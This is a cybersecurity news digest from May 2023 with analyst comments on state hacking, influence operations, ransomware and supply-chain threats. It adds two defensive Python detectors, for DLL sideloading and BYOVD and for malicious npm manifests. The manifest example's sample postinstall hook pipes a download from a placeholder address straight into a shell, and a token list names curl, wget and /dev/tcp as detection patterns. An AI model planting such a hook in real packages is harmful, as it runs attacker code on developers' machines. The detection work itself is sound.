Daily Drop (479): Kremlin drone ‘attack’ Staged, Iranian turn to IO, China 'coercing' Canadian congressman, Italian water supplier attacked, Operation SpecTor, Chinese disinfo network
05-04-2023
Thursday, May 04, 2023 // (IG): BB // Cloak & Dagger // Coffee for Bob
Russia says it will respond to Kremlin drone ‘attack’; Ukraine says drone incident was staged
Analyst Comments: The allegation that Russia staged the drone attack on the Kremlin itself is serious and, if proven, would mark a further escalation between Russia and Ukraine. Whatever the truth of the incident, the competing narratives around it show how misinformation and propaganda are now a standing feature of the conflict, and Ukraine's reading that the event is a pretext for a larger strike is the more immediate concern.
FROM THE MEDIA: Russia has been accused of staging a drone attack on the Kremlin and blaming it on Ukraine. Analysts from the Institute for the Study of War believe that Russia staged the attack to bring the war home to its domestic audience and set conditions for a wider societal mobilization. Meanwhile, Ukraine denied any involvement in the incident, stating that it likely signals that Russia is planning a large-scale terrorist attack against Ukraine in the coming days. Ukraine has also been hit by more drone strikes overnight with Russian forces launching Iranian-made drones aimed at Kyiv and Odesa. Russia's ambassador to the US has said that Russia will respond to the alleged drone attack on the Kremlin when it considers it necessary.
READ THE STORY: CNBC
TSMC and pals dream of €10B German chip fab
Analyst Comments: The news that TSMC is discussing a semiconductor plant in Europe comes as pandemic-era disruptions exposed how dependent European industry, the automotive sector in particular, is on imported chips. A German fab would add local capacity for those customers and support the EU's goal of reducing reliance on foreign supply. TSMC is already expanding production in the US; a European plant would be its first major investment in the region.
FROM THE MEDIA: Taiwan Semiconductor Manufacturing Co. (TSMC) is in talks with Bosch, Infineon, and NXP Semiconductors, as well as the German government, to build a new $11 billion (€10 billion) semiconductor plant in Saxony, Germany. According to unnamed sources, the Taiwanese chipmaker has been pursuing the creation of a European plant for years, but its precise location and purpose have yet to be determined. Bloomberg reports that TSMC initially intended to construct a €7 billion facility for the manufacture of semiconductors for the automotive sector, but it is now expected to focus on mature 28-nanometer parts.
READ THE STORY: The Register
Iranian hackers turn to influence operations to amplify cyberattacks
Analyst Comments: The report highlights how Iran is adopting a strategy that Russia has been using in Ukraine by blending cyberattacks with influence operations to achieve political goals. This approach allows Iran to achieve its political objectives by amplifying the effects of conventional cyberattacks. It is a worrying trend that could have significant consequences for countries targeted by Iran, particularly those in the Middle East.
FROM THE MEDIA: Iranian state-backed hackers are using influence operations to increase the impact of their conventional cyberattacks and promote their political agenda, according to a report by Microsoft. These operations typically target Israel, the US, and those who oppose the Iranian regime. Microsoft identified 24 cyber-enabled influence operations linked to the Iranian government and military in 2022, up from seven in 2021. The operations require fewer resources and less time than traditional ransomware and wiper attacks and, when combined with conventional cyberattacks, can have a longer-lasting effect. The majority of the attacks are carried out by the Emennet Pasargad threat actor. Iranian state-sponsored hackers are also using these techniques against opposition movements within the country.
READ THE STORY: The Record
China says claims of officials 'coercing' Canadian congressman, relatives are false
Analyst Comments: The denial from China's consulate-general in Toronto responds to the Globe and Mail's reporting, citing a CSIS document, that Chinese officials targeted MP Michael Chong and his relatives, and to Prime Minister Justin Trudeau's subsequent comments. Canada has previously been the target of Chinese cyber-attacks, and two of its citizens were detained in China for nearly three years. The incident adds to already tense relations between the two countries and fits a consistent pattern: Beijing denies allegations of interference and coercion outright. It remains to be seen how Canada will respond.
FROM THE MEDIA: China's Toronto consulate-general denied reports of consular officers "coercing" a Canadian lawmaker and his family. In a statement, the consulate called the report "baseless" and urged media and politicians to "stop spreading rumors and smearing". The statement added that Canadian media and politicians were damaging the consulate's reputation and image, and maliciously interfering with normal communication and cooperation between both parties. The statement comes after Canadian Prime Minister Justin Trudeau accused the country's spy agency of withholding information about Chinese threats against Conservative MP Michael Chong and his family in 2021.
READ THE STORY: Reuters
Italian water supplier serving 500,000 people hit with a ransomware attack
Analyst Comments: The ransomware attack on an Italian water supplier highlights the continued threat faced by critical infrastructure providers. As seen in this case, cybercriminals are increasingly targeting essential services such as drinking water, electricity, and gas supplies, and the stakes are high for affected communities. The incident emphasizes the urgent need for critical infrastructure providers to invest in cybersecurity measures to protect against such attacks.
FROM THE MEDIA: Alto Calore Servizi SpA, an Italian company that provides drinking water to nearly half a million people, has experienced technical disruptions following a ransomware attack. The attack has rendered all of their IT systems unusable, with the Medusa ransomware group taking credit for the attack and demanding a ransom. The company did not respond to requests for comment about whether customers were impacted by the incident. The distribution of water, however, appears not to have been affected by the attack. The company manages 58 million cubic meters of water a year and runs the collection, supply, and distribution of drinking water for 125 municipalities in southern Italy. Italy’s public service organizations have faced off against ransomware gangs several times in the last year, including the tax agency and the Italian energy agency that runs the country’s electricity market.
READ THE STORY: The Record
New Report Explores Solutions for Tech Risks in Financial System
Analyst Comments: The report by the World Economic Forum and Deloitte highlights the need for industry leaders, regulators, and consumers to be aware of emerging tech-driven risks and take appropriate action to mitigate them. As the financial system becomes more dependent on technology, new risks are surfacing as a result, and it’s essential to apply solutions throughout the financial services ecosystem to ensure resilience and stability in the coming years. The report provides a useful analysis of the emerging risks in the financial system and mitigation strategies that can be adopted by financial services executives, policy-makers, and regulators.
FROM THE MEDIA: The World Economic Forum (WEF) in collaboration with Deloitte has published a report titled "Pushing Through Undercurrents" that explores how technology-driven risks in financial services sectors can become systemic threats to the global financial system. The report examines how different forces influence the way tech-driven risks spread and offers approaches that financial services executives, policy-makers, regulators, and others can use to mitigate these risks. The risks include everything from social media enabling the manipulation of stock markets to increased risks from a rise in “buy now pay later” debt, and more. The report also explores managing geopolitical risks, such as the financial system’s vulnerability to state-sponsored cyberattacks, as a top priority for the financial system.
READ THE STORY: Modern Diplomacy
Canada's spy agency withheld information about China's threats to lawmaker
Analyst Comments: The revelation that Canadian intelligence failed to inform a lawmaker about Chinese threats against him and his family adds to concerns about Chinese interference in Canadian politics. Canadian officials have previously accused China of trying to meddle in the country's elections, and these latest allegations will only add to tensions between the two countries. That Chong learned of the threats from a newspaper rather than from CSIS is likely to raise questions about the agency's handling of the matter and about how intelligence reaches ministers and the people it concerns. It remains to be seen what further fallout, if any, will result.
FROM THE MEDIA: Canadian Prime Minister Justin Trudeau said that the Canadian Security Intelligence Service (CSIS) failed to inform Michael Chong, a member of parliament with Canada's opposition Conservative party, about Chinese threats against him and his family in 2021. Chong had learned about the threats from a newspaper, not from the CSIS. Trudeau stated that he had told the agency that such threats must be revealed immediately in the future. The Globe and Mail newspaper reported the threats on Monday, citing a CSIS report. Several Canadian media outlets have reported on anonymous intelligence sources alleging schemes run by the Chinese government to interfere in Canada's last two elections. Beijing has denied those allegations. Trudeau has appointed an independent special investigator to probe the allegations.
READ THE STORY: Saltwire
Operation SpecTor: $53.4 Million Seized, 288 Vendors Arrested in Dark Web Drug Bust
Analyst Comments: The international law enforcement effort against dark web drug dealers is a significant development in the fight against drug trafficking and other illicit activities on the internet. The arrests and confiscations of cash, virtual currencies, drugs, and firearms will disrupt the operations of drug dealers and other criminals on the dark web. The success of Operation SpecTor highlights the importance of international cooperation among law enforcement agencies to combat transnational crime. The operation also underscores the limitations of anonymity and privacy on the dark web, as law enforcement agencies can use advanced technologies and techniques to track down criminals operating on the platform.
FROM THE MEDIA: Operation SpecTor, an international law enforcement effort coordinated by Europol, has resulted in the arrest of 288 vendors suspected of drug trafficking on the dark web across Europe, the United States, and Brazil. The operation also led to the confiscation of $53.4 million in cash and virtual currencies, 850 kg of drugs, and 117 firearms. Most of the arrests were made in the United States, followed by the United Kingdom, Germany, and the Netherlands. The operation built on the German takedown of the Monopoly Market in December 2021, which gave investigators the data to identify vendors and buyers. Many of those vendors were also active on other illicit marketplaces, so the arrests further disrupted the trade in drugs and other illicit goods on the dark web. Europol stated that some of the apprehended individuals were considered high-value targets.
READ THE STORY: THN
Give NotPetya-hit Merck that $1.4B, appeals court tells insurers
Analyst Comments: The New Jersey court's ruling is a significant win for Merck and sets a precedent that will make it more challenging for insurers to use the act-of-war clause as a catch-all for government-linked cyberattacks. The decision is likely to affect the language used in underwriting policies and force insurers to rethink their approach to cyber risk. The ruling also highlights the need for insurance policies to adjust accordingly, particularly as the virtual and kinetic worlds become more interconnected.
FROM THE MEDIA: A court in New Jersey has ruled that insurers for pharmaceutical giant Merck cannot use an "act of war" clause in their insurance policies to deny the company's $1.4 billion payout to clean up its NotPetya infection. The court ruled that the attack against Merck was not specifically linked to Russian military action, and the war exclusion clause did not apply. Industry watchers say the ruling will make it more difficult for insurance companies to use war as an excuse not to pay losses related to cyberattacks. The decision may also affect the language used in underwriting policies, particularly with regard to risks such as ransomware and cyber warfare.
READ THE STORY: The Register
Chinese Hacker Group Earth Longzhi Resurfaces with Advanced Malware Tactics
Analyst Comments: The resurfacing of Earth Longzhi with a new campaign against targets in the Southeast Asian region is consistent with the group's previous attacks. The use of vulnerable public-facing applications to infiltrate targets has been a common tactic used by advanced threat actors. The group's use of BYOVD attacks and its exploitation of zamguard.sys to disable security products installed on hosts are also known tactics used by Chinese state-sponsored hackers.
FROM THE MEDIA: A Chinese state-sponsored hacking group, Earth Longzhi, a subgroup within APT41, has launched a new cyber-espionage campaign targeting government, healthcare, technology, and manufacturing entities in Taiwan, Thailand, the Philippines, and Fiji. The attack chain uses a vulnerable public-facing application as an entry point to deploy the BEHINDER web shell, which the group then uses to drop additional payloads, including a new variant of a Cobalt Strike loader called CroxLoader. The hackers used a Windows Defender executable to perform DLL sideloading and exploited a vulnerable driver to disable security products installed on the hosts via a bring your own vulnerable driver (BYOVD) attack. The malware also employs a second method, called "stack rumbling," which causes targeted applications to crash upon launch.
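The two host-side techniques in this story, DLL sideloading by a signed vendor binary and a BYOVD driver load, are both visible in endpoint telemetry. The following is an added example, not code from the article or from the underlying research, of two detection rules run over constructed Sysmon-style events (Event ID 7 ImageLoad, Event ID 6 DriverLoad). The file names, paths and signer strings are assumptions for illustration; zamguard.sys is the driver the article names, and MpCmdRun.exe is used only as a stand-in for "a Windows Defender executable".

```python
"""Added example: detect DLL sideloading and BYOVD driver loads over
constructed Sysmon-style events. Not from the original article; file
names, paths and signer strings are assumptions for illustration."""
from dataclasses import dataclass
import ntpath

# Directories in which a Microsoft-signed host binary is expected to load its DLLs.
TRUSTED_DIRS = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender",
)

# Driver names known to be abusable. zamguard.sys is the one the article names;
# in practice this set would be populated from a maintained list such as LOLDrivers.
KNOWN_VULNERABLE_DRIVERS = {"zamguard.sys"}
DRIVER_DIR = r"c:\windows\system32\drivers"


@dataclass
class Event:
    event_id: int       # Sysmon event ID: 7 = ImageLoad, 6 = DriverLoad
    image: str          # process that loaded the module (ImageLoad only)
    image_signer: str   # signer of that process image, "" if unsigned
    loaded: str         # path of the DLL or driver that was loaded
    loaded_signer: str  # signer of the loaded module, "" if unsigned


def _dir(path: str) -> str:
    return ntpath.dirname(path).lower()


def detect_dll_sideload(ev: Event):
    """Flag a Microsoft-signed executable loading a non-Microsoft DLL from its
    own directory when that directory is not a trusted install location.
    This is the classic 'copy signed EXE + malicious DLL to a writable folder'."""
    if ev.event_id != 7 or ev.image_signer != "Microsoft Windows":
        return None
    if not ev.loaded.lower().endswith(".dll"):
        return None
    if ev.loaded_signer == "Microsoft Windows":
        return None
    if _dir(ev.loaded) != _dir(ev.image):
        return None
    if any(_dir(ev.image).startswith(d) for d in TRUSTED_DIRS):
        return None
    return {"rule": "dll_sideload", "image": ev.image, "loaded": ev.loaded}


def detect_byovd(ev: Event):
    """Flag a known-vulnerable driver, or any driver loaded from outside the
    system driver directory (a validly signed driver can still be abusable)."""
    if ev.event_id != 6:
        return None
    name = ntpath.basename(ev.loaded).lower()
    if name in KNOWN_VULNERABLE_DRIVERS:
        return {"rule": "byovd_known_driver", "loaded": ev.loaded}
    if not _dir(ev.loaded).startswith(DRIVER_DIR):
        return {"rule": "driver_outside_system_dir", "loaded": ev.loaded}
    return None


def scan(events):
    """Run every rule over every event and return the findings in order."""
    findings = []
    for ev in events:
        for rule in (detect_dll_sideload, detect_byovd):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    # benign: Defender binary loading its own DLL from the install directory
    Event(7, r"C:\Program Files\Windows Defender\MpCmdRun.exe", "Microsoft Windows",
          r"C:\Program Files\Windows Defender\MpClient.dll", "Microsoft Windows"),
    # suspicious: same signed binary copied to a writable folder, loading an unsigned DLL
    Event(7, r"C:\Users\Public\Libraries\MpCmdRun.exe", "Microsoft Windows",
          r"C:\Users\Public\Libraries\mpclient.dll", ""),
    # benign driver load
    Event(6, "", "", r"C:\Windows\System32\drivers\tcpip.sys", "Microsoft Windows"),
    # BYOVD: a validly signed but vulnerable driver dropped into a temp folder
    Event(6, "", "", r"C:\Windows\Temp\zamguard.sys", "Zemana Ltd."),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f)
```

The sideload rule keys on the combination (signed host, unsigned DLL, same non-standard directory) rather than on any one file name, because the attacker picks the host binary; the driver rule keeps a name list only as a fast path and treats any driver loaded from outside the system driver directory as worth a look on its own.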
READ THE STORY: THN
Meta: Chinese disinformation network was behind London front company recruiting content creators
Analyst Comments: The discovery of this Chinese disinformation network highlights the increasing prevalence of state-backed disinformation campaigns aimed at manipulating public opinion and disrupting democratic processes. The use of a front company in London to recruit content creators and translators underscores the sophistication and global reach of these operations. The involvement of Chinese state-affiliated entities in such activities is particularly concerning and underscores the need for greater regulation of social media platforms to counter the spread of disinformation.
FROM THE MEDIA: Meta has removed over 100 accounts on Facebook and dozens on Instagram belonging to a Chinese disinformation network that used a front company in London to recruit content creators and translators around the world. The network created fake personas impersonating companies and institutions in the US and EU, producing posts mimicking the entity before publishing negative commentary about Uyghur activists and critics of the Chinese state. The operation was used to target almost all major social media platforms, including Facebook and Instagram. While the actual operators of this network attempted to conceal their identities, Meta said its investigation had "found links to individuals in China associated with Xi'an Tainwendian Network Technology, an information technology company."
READ THE STORY: The Record
The unknown Indian company shipping millions of barrels of Russian oil
Analyst Comments: The rapid growth of Gatik Ship Management has raised concerns about its ownership and the nature of its relationship with Rosneft. The lack of transparency in the shipping industry has made it easier for companies to operate in secrecy, and this has led to concerns that some companies may be facilitating activities that are illegal or that pose a risk to national security. Given the close relationship between Rosneft and the Russian government, there is a risk that Gatik may be unwittingly involved in activities that are against India's interests. While the exact nature of Gatik's relationship with Rosneft is unknown, the Indian government should conduct an investigation to ensure that the country's security interests are not being compromised.
FROM THE MEDIA: Gatik Ship Management, an Indian shipping company, has grown into one of the largest oil tanker owners in the world, having acquired 56 vessels worth an estimated combined value of $1.6bn in just 18 months. However, Gatik's origins and ownership are shrouded in mystery, with corporate records being scant, and it not appearing in India's official corporate registry. While there are suspicions of a link between Gatik's biggest client, Rosneft, and Gatik's rapid expansion, it is unclear who owns Buena Vista Shipping, which shares an address with Gatik. The majority of Gatik's newly acquired fleet has been used to transport oil from Russia, mainly to ports in India, with tanker tracking data showing that Gatik has shipped at least 83mn barrels of Russian crude and oil products, with more than half coming from Rosneft. The exact nature of the relationship between Gatik and Rosneft is unclear, but the two companies appear to have a close relationship.
READ THE STORY: FT
Storing the Quran on your phone makes you a terror suspect in China
Analyst Comments: The Chinese government has been targeting its minority Muslim population in Xinjiang for years, implementing a massive surveillance and detention program that has drawn global condemnation. While China has argued that this campaign targets violent extremism and separatism, critics say it amounts to cultural genocide. The revelation that simply having religious materials on a mobile device is enough to flag someone as a potential terrorist risk adds weight to concerns about the extreme and invasive surveillance measures used in Xinjiang. The findings from HRW are likely to lead to further condemnation of China’s policies towards its Muslim population.
FROM THE MEDIA: Police in China's Xinjiang region have conducted more than 11 million searches of residents' devices to check for the presence of 50,000 items considered indicators of dissent or terror. Among them is the Quran, the central text of Islam, according to The Intercept. Advocacy group Human Rights Watch has released an analysis of the leaked list of material, which it said was used by the Xinjiang police, and found that half of the flagged items appear to be common Islamic religious materials. HRW said that any individual in Xinjiang with the documents on their devices can be deemed a terrorist risk.
READ THE STORY: The Register
WinRAR Weaponized for Attacks on Ukrainian Public Sector
Analyst Comments: The identification of RoarBat highlights the continued use of destructive malware by Russian threat actors, and it underscores the danger that such attacks pose to Ukraine and potentially to other targets in the future. The likely involvement of Sandworm, a threat group attributed to Russian military intelligence (GRU), adds to existing concerns about Russian cyber operations and the threat they pose to critical infrastructure. The initial access route reported here, a compromised VPN credential, is also a reminder that destructive payloads usually ride in on ordinary credential hygiene failures.
FROM THE MEDIA: Ukrainian cybersecurity defenders have identified a malicious script called RoarBat, used to delete files in a state agency, which they believe was planted by the Russian GRU-linked group known as Sandworm. The attackers likely gained access through a compromised VPN credential. Indicators point to Sandworm, with similarities to a January attack on Ukrinform. CyberArmyofRussia_Reborn was the group that published information about the Ukrinform attack, but Ukrainian defenders believe that Sandworm was responsible. Russian hacking objectives have shifted toward energy infrastructure in Ukraine.
READ THE STORY: Bank InfoSec
Anatomy of a Malicious Package Attack
Analyst Comments: The article provides a good overview of the threat posed by malicious packages and the basic techniques used by attackers to create and distribute them. The increasing threat of malicious package attacks adds further urgency to the growing need for a new approach to application security programs. The article also provides practical advice to companies to start prioritizing their software supply chain and to use automated scanning tools to monitor open-source code repositories and libraries for vulnerabilities and attacks.
FROM THE MEDIA: Malicious packages are open-source packages published with malicious intent, and they are remarkably easy to create and proliferating at an alarming pace. Attackers get them into a victim's build through four basic vectors: brandjacking, typosquatting, dependency hijacking, and dependency confusion. Once installed, the packages tend to rely on four common techniques: pre- and post-install scripts, basic evasion techniques, shell commands, and basic network communication for download or exfiltration. Malicious packages are an urgent threat to software and systems, and companies must use automated scanning tools that can monitor open-source code repositories and libraries for vulnerabilities and attacks.
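Three of the warning signs above (install hooks, typosquatting and dependency confusion) can be checked offline from a package manifest before anything is installed. The following is an added example, not code from the Dark Reading article, that runs such a check over a constructed npm-style package.json. The popular-package list, the internal package names and the suspicious-token list are assumptions for illustration; in practice they would come from registry download counts and the organisation's private registry. Brandjacking and dependency hijacking need registry metadata (publisher, maintainer changes) and are not covered.

```python
"""Added example: offline manifest checks for install hooks, typosquats and
dependency confusion. Not from the original article; package names, the
internal-package list and token list are assumptions for illustration."""
import difflib
import json

# Lifecycle hooks npm runs automatically on install: where first-stage logic hides.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Substrings that are rarely legitimate in the install hook of a library.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "node -e", "base64", "powershell",
                     "/dev/tcp", "eval(", "http://", "https://")

# Constructed stand-in for a list of popular packages.
POPULAR = sorted({"lodash", "express", "react", "axios", "chalk", "request"})

# Bare (unscoped) names that exist only on the organisation's internal registry (assumed).
# A public package with the same name can win resolution: dependency confusion.
INTERNAL_NAMES = {"acme-billing", "acme-auth"}


def check_install_hooks(manifest):
    """Flag install-time hooks whose command contains download/exec tokens."""
    findings = []
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue
        hits = [t for t in SUSPICIOUS_TOKENS if t in cmd]
        if hits:
            findings.append({"kind": "install_script", "hook": hook, "tokens": hits})
    return findings


def check_typosquats(manifest, threshold=0.8):
    """Flag dependencies that are not a popular package but look like one."""
    findings = []
    for dep in manifest.get("dependencies", {}):
        if dep in POPULAR:
            continue
        match = difflib.get_close_matches(dep, POPULAR, n=1, cutoff=threshold)
        if match:
            findings.append({"kind": "typosquat", "dependency": dep, "looks_like": match[0]})
    return findings


def check_dependency_confusion(manifest):
    """Flag internal package names referenced without a private scope."""
    findings = []
    for dep in manifest.get("dependencies", {}):
        if dep in INTERNAL_NAMES and not dep.startswith("@"):
            findings.append({"kind": "dependency_confusion", "dependency": dep,
                             "fix": "publish and reference it under a private scope"})
    return findings


def scan_manifest(manifest):
    """Run all checks over a parsed manifest and return the combined findings."""
    return (check_install_hooks(manifest)
            + check_typosquats(manifest)
            + check_dependency_confusion(manifest))


def scan_manifest_json(text):
    """Convenience wrapper for a raw package.json string."""
    return scan_manifest(json.loads(text))


# Constructed sample manifest (not a real package); 203.0.113.5 is a documentation address.
SAMPLE_MANIFEST_JSON = """{
  "name": "demo-app",
  "scripts": {
    "postinstall": "node -e \\"require('child_process').exec('curl http://203.0.113.5/x.sh | sh')\\"",
    "test": "jest"
  },
  "dependencies": {
    "lodahs": "^4.17.21",
    "express": "^4.18.2",
    "acme-billing": "1.0.0",
    "react": "^18.2.0"
  }
}"""
SAMPLE_MANIFEST = json.loads(SAMPLE_MANIFEST_JSON)

if __name__ == "__main__":
    for f in scan_manifest(SAMPLE_MANIFEST):
        print(f)
```

The typosquat check uses difflib's similarity ratio with a 0.8 cutoff, which catches single transpositions and dropped letters against short names; for a real allowlist you would also compare against the name with common separators removed. The install-hook check is deliberately a string match: the point is to make a human look at any library that needs to run a shell at install time at all.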
READ THE STORY: DARKReading